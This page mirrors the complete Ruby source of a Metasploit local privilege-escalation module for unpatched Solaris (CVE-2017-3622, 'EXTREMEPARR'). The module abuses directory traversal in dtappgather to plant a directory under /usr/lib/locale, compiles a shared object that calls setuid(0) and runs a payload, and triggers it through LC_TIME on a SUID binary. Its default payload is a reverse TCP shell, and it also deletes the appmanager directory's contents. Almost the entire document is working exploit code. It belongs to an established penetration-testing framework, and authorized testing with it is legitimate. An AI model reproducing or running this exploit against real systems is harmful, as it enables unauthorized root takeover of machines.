CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Solaris::Priv

11
  include Msf::Post::Solaris::System

12
  include Msf::Post::Solaris::Kernel

13
  include Msf::Exploit::EXE

14
  include Msf::Exploit::FileDropper

15
  prepend Msf::Exploit::Remote::AutoCheck

16


17
  def initialize(info = {})

18
    super(update_info(info,

19
      'Name'           => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",

20
      'Description'    => %q{

21
        This module exploits a directory traversal vulnerability in the

22
        `dtappgather` executable included with Common Desktop Environment (CDE)

23
        on unpatched Solaris systems prior to Solaris 10u11 which allows users

24
        to gain root privileges.

25


26
        dtappgather allows users to create a user-owned directory at any

27
        location on the filesystem using the `DTUSERSESSION` environment

28
        variable.

29


30
        This module creates a directory in `/usr/lib/locale`, writes a shared

31
        object to the directory, and runs the specified SUID binary with the

32
        shared object loaded using the `LC_TIME` environment variable.

33


34
        This module has been tested successfully on:

35


36
        Solaris 9u7 (09/04) (x86);

37
        Solaris 10u1 (01/06) (x86);

38
        Solaris 10u2 (06/06) (x86);

39
        Solaris 10u4 (08/07) (x86);

40
        Solaris 10u8 (10/09) (x86);

41
        Solaris 10u9 (09/10) (x86).

42
      },

43
      'References'     =>

44
        [

45
          ['BID', '97774'],

46
          ['CVE', '2017-3622'],

47
          ['EDB', '41871'],

48
          ['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],

49
          ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']

50
        ],

51
      'Notes'          => {

52
        'Stability' => [CRASH_SAFE],

53
        'SideEffects' => [],

54
        'Reliability' => [],

55
        'AKA' => ['EXTREMEPARR'] },

56
      'License'        => MSF_LICENSE,

57
      'Author'         =>

58
        [

59
          'Shadow Brokers',   # exploit

60
          'Hacker Fantastic', # dtappgather-poc.sh

61
          'bcoles'     # Metasploit

62
        ],

63
      'DisclosureDate' => '2017-04-24',

64
      'Privileged'     => true,

65
      'Platform'       => ['solaris', 'unix'],

66
      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],

67
      'Targets'        => [['Auto', {}]],

68
      'SessionTypes'   => ['shell', 'meterpreter'],

69
      'DefaultOptions' =>

70
        {

71
          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',

72
          'WfsDelay'    => 10,

73
          'PrependFork' => true

74
        },

75
      'DefaultTarget'  => 0))

76
    register_options [

77
      # Some useful example SUID executables:

78
      # * /usr/bin/at

79
      # * /usr/bin/cancel

80
      # * /usr/bin/chkey

81
      # * /usr/bin/lp

82
      # * /usr/bin/lpset

83
      # * /usr/bin/lpstat

84
      # * /usr/lib/lp/bin/netpr

85
      # * /usr/sbin/lpmove

86
      OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),

87
      OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])

88
    ]

89
    register_advanced_options [

90
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])

91
    ]

92
  end

93


94
  def suid_bin_path

95
    datastore['SUID_PATH']

96
  end

97


98
  def dtappgather_path

99
    datastore['DTAPPGATHER_PATH']

100
  end

101


102
  def mkdir(path)

103
    vprint_status "Creating directory '#{path}'"

104
    cmd_exec "mkdir -p '#{path}'"

105
    register_dir_for_cleanup path

106
  end

107


108
  def upload(path, data)

109
    print_status "Writing '#{path}' (#{data.size} bytes) ..."

110
    rm_f path

111
    write_file path, data

112
    register_file_for_cleanup path

113
  end

114


115
  def upload_and_compile(path, data)

116
    upload "#{path}.c", data

117


118
    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c"

119
    unless output.blank?

120
      print_error output

121
      fail_with Failure::Unknown, "#{path}.c failed to compile"

122
    end

123


124
    register_file_for_cleanup path

125
  end

126


127
  def symlink(link_target, link_name)

128
    vprint_status "Symlinking #{link_target} to #{link_name}"

129
    rm_f link_name

130
    cmd_exec "ln -sf #{link_target} #{link_name}"

131
    register_file_for_cleanup link_name

132
  end

133


134
  def check

135
    [dtappgather_path, suid_bin_path].each do |path|

136
      unless setuid? path

137
        vprint_error "#{path} is not setuid"

138
        return CheckCode::Safe

139
      end

140
      vprint_good "#{path} is setuid"

141
    end

142


143
    unless has_gcc?

144
      vprint_error 'gcc is not installed'

145
      return CheckCode::Safe

146
    end

147
    vprint_good 'gcc is installed'

148


149
    version = kernel_release

150
    if version.to_s.eql? ''

151
      vprint_error 'Could not determine Solaris version'

152
      return CheckCode::Detected

153
    end

154


155
    unless Rex::Version.new(version).between? Rex::Version.new('5.7'), Rex::Version.new('5.10')

156
      vprint_error "Solaris version #{version} is not vulnerable"

157
      return CheckCode::Safe

158
    end

159
    vprint_good "Solaris version #{version} appears to be vulnerable"

160


161
    CheckCode::Appears

162
  end

163


164
  def exploit

165
    if is_root?

166
      fail_with Failure::BadConfig, 'Session already has root privileges'

167
    end

168


169
    unless writable? datastore['WritableDir']

170
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"

171
    end

172


173
    # Remove appmanager directory and contents

174
    appmanager_path = '/var/dt/appconfig/appmanager'

175
    vprint_status "Cleaning appmanager directory #{appmanager_path}"

176
    cmd_exec "chmod -R 755 #{appmanager_path}/*"

177
    cmd_exec "rm -rf #{appmanager_path}/*"

178
    rm_f appmanager_path

179


180
    # Create writable directory in /usr/lib/locale

181
    locale_path = '/usr/lib/locale'

182
    locale_name = rand_text_alphanumeric 5..10

183
    new_dir = "#{locale_path}/#{locale_name}"

184
    vprint_status "Creating directory #{new_dir}"

185
    depth = 3

186
    cmd_exec "DTUSERSESSION=. /usr/dt/bin/dtappgather"

187
    depth.times do

188
      cmd_exec "DTUSERSESSION=.. /usr/dt/bin/dtappgather"

189
    end

190
    symlink locale_path, appmanager_path

191
    cmd_exec "DTUSERSESSION=#{locale_name} #{dtappgather_path}"

192
    unless cmd_exec("ls -al #{locale_path} | grep #{locale_name}").to_s.include? locale_name

193
      fail_with Failure::NotVulnerable, "Could not create directory #{new_dir}"

194
    end

195


196
    print_good "Created directory #{new_dir}"

197
    register_dir_for_cleanup new_dir

198


199
    rm_f appmanager_path

200
    cmd_exec "chmod 755 #{new_dir}"

201


202
    # Upload and compile shared object

203
    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"

204
    mkdir base_path

205


206
    payload_name = ".#{rand_text_alphanumeric 5..10}"

207
    payload_path = "#{base_path}/#{payload_name}"

208


209
    so = <<-EOF

210
      void __attribute__((constructor)) cons() {

211
        setuid(0);

212
        setgid(0);

213
        execle("#{payload_path}", "", 0, 0);

214
        _exit(0);

215
      }

216
    EOF

217


218
    so_name = ".#{rand_text_alphanumeric 5..10}"

219
    so_path = "#{base_path}/#{so_name}"

220
    upload_and_compile so_path, so

221


222
    vprint_status "Writing shared objects to #{new_dir}"

223
    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'"

224
    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.2"

225
    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'"

226
    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.3"

227


228
    # Upload and execute payload

229
    upload payload_path, generate_payload_exe

230
    cmd_exec "chmod +x #{payload_path}"

231


232
    print_status 'Executing payload...'

233
    cmd_exec "LC_TIME=#{locale_name} #{suid_bin_path} & echo "

234
  end

235
end

236


237